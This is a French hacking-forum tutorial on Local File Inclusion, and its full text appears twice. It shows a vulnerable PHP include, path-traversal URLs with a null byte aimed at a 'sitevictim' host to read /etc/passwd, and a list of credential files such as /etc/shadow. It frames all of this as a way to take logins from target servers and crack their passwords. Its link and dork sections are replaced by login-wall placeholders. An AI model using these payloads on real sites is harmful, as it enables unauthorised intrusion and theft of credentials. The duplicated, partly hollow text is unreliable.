Salut tout le monde
Je vais vous présentez une faille assez connue, c'est la faille LFI.
Sommaire :
- C'est quoi ça LFI ?
- Dorks LFI
- Principe et exploitation de la faille
- Conclusion
C'est parti !
C'est quoi ça LFI ?
Une LFI veut dire Local File Inclusion. Une pratique simple à comprendre, il suffit de regarder la nom de cette faille.
Citation:
Traduction -> Inclusion de fichier local.
Dorks LFI :
Voici une liste de dorks LFI orientée pour les faille de type LFI :
Citation:
Principe et exploitation de la faille :
C'est une faille de type Include, et on va inclure un fichier. Regardez ce code :
Citation:
<?php include($_GET['page'].".php");?>
Ce code-ci va essayer d'inclure une page, et d'y ajouter ".php" à la fin.
L'url pour inclure la fameuse page news sera :
Citation:
index.php?page=news
Et même ce code reste toujours faillible, à condition que les "Magic Quotes" soient désactivés (option PHP pour transformer les ' en \' automatiquement).
Si le serveur n'a pas activé les magic quotes, on va utiliser le null byte. Le null byte, c'est un caractère ayant pour valeur zéro. Il est représenté par "%00".
Ce genre de faille nous permet de naviguer dans le serveur cible. Imaginez un fichier qui se nomme "salut.php" qui se trouve dans le repertoire "pioneer", si vous faites :
Citation:
sitevictime.fr/pioneer/salut.php
Normalement la page s'affichera normalement. N'oubliez pas certaine syntaxe qui vont nous êtres utiles :
Citation:
Pour remonter dans le dossier avant : ../
Pour remonter dans le dossier ou l'on est : ./
Si vous ne comprennez pas bien, ne vous inquiétez pas, des exemples vont arrivés
Maintenant que nous pouvons nous ballader dans le serveur, si c'est un serveur UNIX (comme la plupart des cas) vous pouvez faire ceci (à quelques " ../ " près) :
Citation:
Vous l'aurez compris, on va remonter dans le serveur pour trouver le fichier "passwd". Le fichier "passwd" va s'inclure car le ".php" va être supprimé grâce au Null byte.
Les données stockés dans notre fichier "passwd" va s'afficher comme ceci :
Citation:
username: passwd: UI
GI
full_name: directory: shell
Par exemple :
Citation:
Nom d'utilisateur: kbeMVnZM0oL7I: 503:100: Nom / prénom: / home / username: / bin / sh
Vous allez récuperer le login et décrypter le mots de passe.
Voici quelques repertoires qui mérite le coup d'oeil :
Citation:
/ etc / passwd
/etc/ shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Si vous avez à faire avec un null byte :
Citation:
sitevictim.fr/index.php?=../../../../../../../../fichier etc/passwd.php
Ce fichier n'existe pas, et vous verrez un message d'erreur, vous avez donc besoin d'appliquer le null byte (l'octet nul) (% 00) :
Citation:
sitevictim.com/index.php?=../../../../../../../../fichier etc/passwd% 00
Avec l'octet nul le serveur va ignorer tout ce qui vient après le "% 00"
Conclusion :
J'espère que se tuto vous a été utile, cette faille est du même esprit que la faille RFI (je ferais bientot un tuto ! ) Si vous avez des questions n'hésitez pas.
ênissay»
Source :
Je vais vous présentez une faille assez connue, c'est la faille LFI.
Sommaire :
- C'est quoi ça LFI ?
- Dorks LFI
- Principe et exploitation de la faille
- Conclusion
C'est parti !
C'est quoi ça LFI ?
Une LFI veut dire Local File Inclusion. Une pratique simple à comprendre, il suffit de regarder la nom de cette faille.
Citation:
Traduction -> Inclusion de fichier local.
Dorks LFI :
Voici une liste de dorks LFI orientée pour les faille de type LFI :
Citation:
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
Principe et exploitation de la faille :
C'est une faille de type Include, et on va inclure un fichier. Regardez ce code :
Citation:
<?php include($_GET['page'].".php");?>
Ce code-ci va essayer d'inclure une page, et d'y ajouter ".php" à la fin.
L'url pour inclure la fameuse page news sera :
Citation:
index.php?page=news
Et même ce code reste toujours faillible, à condition que les "Magic Quotes" soient désactivés (option PHP pour transformer les ' en \' automatiquement).
Si le serveur n'a pas activé les magic quotes, on va utiliser le null byte. Le null byte, c'est un caractère ayant pour valeur zéro. Il est représenté par "%00".
Ce genre de faille nous permet de naviguer dans le serveur cible. Imaginez un fichier qui se nomme "salut.php" qui se trouve dans le repertoire "pioneer", si vous faites :
Citation:
sitevictime.fr/pioneer/salut.php
Normalement la page s'affichera normalement. N'oubliez pas certaine syntaxe qui vont nous êtres utiles :
Citation:
Pour remonter dans le dossier avant : ../
Pour remonter dans le dossier ou l'on est : ./
Si vous ne comprennez pas bien, ne vous inquiétez pas, des exemples vont arrivés

Maintenant que nous pouvons nous ballader dans le serveur, si c'est un serveur UNIX (comme la plupart des cas) vous pouvez faire ceci (à quelques " ../ " près) :
Citation:
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
Vous l'aurez compris, on va remonter dans le serveur pour trouver le fichier "passwd". Le fichier "passwd" va s'inclure car le ".php" va être supprimé grâce au Null byte.
Les données stockés dans notre fichier "passwd" va s'afficher comme ceci :
Citation:
username: passwd: UI
Par exemple :
Citation:
Nom d'utilisateur: kbeMVnZM0oL7I: 503:100: Nom / prénom: / home / username: / bin / sh
Vous allez récuperer le login et décrypter le mots de passe.
Voici quelques repertoires qui mérite le coup d'oeil :
Citation:
/ etc / passwd
/etc/ shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Si vous avez à faire avec un null byte :
Citation:
sitevictim.fr/index.php?=../../../../../../../../fichier etc/passwd.php
Ce fichier n'existe pas, et vous verrez un message d'erreur, vous avez donc besoin d'appliquer le null byte (l'octet nul) (% 00) :
Citation:
sitevictim.com/index.php?=../../../../../../../../fichier etc/passwd% 00
Avec l'octet nul le serveur va ignorer tout ce qui vient après le "% 00"
Conclusion :
J'espère que se tuto vous a été utile, cette faille est du même esprit que la faille RFI (je ferais bientot un tuto ! ) Si vous avez des questions n'hésitez pas.
ênissay»
Source :
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
Dernière édition par un modérateur: